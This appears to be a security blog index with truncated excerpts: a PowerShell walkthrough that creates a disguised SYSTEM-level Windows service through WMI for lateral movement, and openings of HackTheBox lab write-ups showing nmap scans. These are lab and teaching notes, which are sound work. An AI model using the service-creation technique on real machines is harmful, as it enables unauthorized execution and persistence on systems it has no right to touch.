Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods Create a service: PS C:\Users\victim6\Downloads> $servicetype = [byte] 16 PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1 PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, “Windows performance”,$errorcontrol, $null, $null,”WinPerf”,”C:\Windows\Syetm32\calc.exe”, $null, $servicetype, “Manual”, “NT Authority\system”, ” “ PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘ Start the service: PS C:\Users\victim6\Downloads> Get-WmiObject…

HACKTHEBOX

Chainsaw – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.142 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 10:53 GMT Nmap scan report for 10.10.10.142 Host is up (0.21s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r–r– 1 1001 1001 23828 Dec 05…

HACKTHEBOX

Heist – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.149 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 02:35 GMT Nmap scan report for 10.10.10.149 Host is up (0.21s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially…

HACKTHEBOX

Lame (HACKTHEBOX)

Method 1: root@kali:~/Downloads# nmap -A 10.10.10.3 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 18:32 EST Nmap scan report for 10.10.10.3 Host is up (0.14s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server…